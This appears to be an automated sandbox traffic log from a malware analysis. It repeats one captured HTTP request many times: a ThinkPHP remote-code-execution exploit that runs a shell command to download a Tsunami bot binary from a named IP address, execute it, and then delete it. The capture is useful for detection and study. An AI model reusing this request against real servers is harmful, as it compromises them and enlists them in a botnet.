    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
